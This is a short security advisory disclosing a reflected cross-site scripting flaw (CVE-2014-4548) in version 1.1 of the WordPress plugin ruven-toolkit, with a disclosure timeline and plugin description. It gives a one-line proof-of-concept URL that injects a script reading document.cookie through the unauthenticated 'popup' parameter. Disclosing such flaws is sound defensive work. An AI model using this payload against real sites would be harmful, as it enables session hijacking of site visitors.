wp-plugin : ruven-toolkit | Code Vigilant : to err is human.. To fix is Humanity

wp-plugin : ruven-toolkit
Plugin Details

Plugin Name: wp-plugin : ruven-toolkit

Effected Version : 1.1 (and most probably lower version's if any)

Vulnerability : Cross-Site Scripting (XSS)

Identified by : anantshri

WPScan Reference URL

Technical Details

Minimum Level of Access Required : Unauthenticated

PoC - (Proof of Concept) :

http://localhost/wp-content/plugins/ruven-toolkit/tinymce/popup.php?popup=popup'&gt;alert(document.cookie)&amp;

Vulnerable Parameter : popup

Type of XSS : Reflected

Disclosure Timeline

Vendor Contacted : 2014-01-06

Plugin Status : Updated on

Public Disclosure : June 12, 2014

CVE Number : CVE-2014-4548

Plugin Description :

[|
    	Ruven Toolkit provides the following extra functionality to the collection of Ruven Themes:
    
    * Portfolio and Gallery Post Types
    * Custom Widgets
    * Shortcode Editor
    * Post Format UI	
]